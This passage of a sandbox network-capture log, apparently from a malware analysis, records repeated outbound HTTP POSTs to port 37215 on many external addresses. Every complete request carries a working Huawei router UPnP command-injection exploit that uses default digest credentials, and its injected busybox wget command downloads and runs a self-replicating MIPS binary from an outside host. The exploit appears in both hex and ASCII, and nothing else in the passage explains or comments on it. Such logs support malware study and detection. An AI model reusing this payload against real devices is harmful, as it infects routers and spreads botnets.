2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1095192.168.2.133981864.225.87.7337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.504651070 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1096192.168.2.133559641.74.118.16437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.504767895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1097192.168.2.1344244157.175.119.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.504815102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1098192.168.2.1355004157.99.54.15837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.504838943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1099192.168.2.1342324197.190.130.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.505028963 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1100192.168.2.1345864157.158.27.10537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.505059958 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1101192.168.2.133693241.93.10.20837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.505086899 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1102192.168.2.1338884197.52.241.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.505112886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1103192.168.2.134695241.56.163.11837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.505151987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1104192.168.2.134318041.61.234.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.505309105 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1105192.168.2.1348718157.145.8.16437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.505340099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
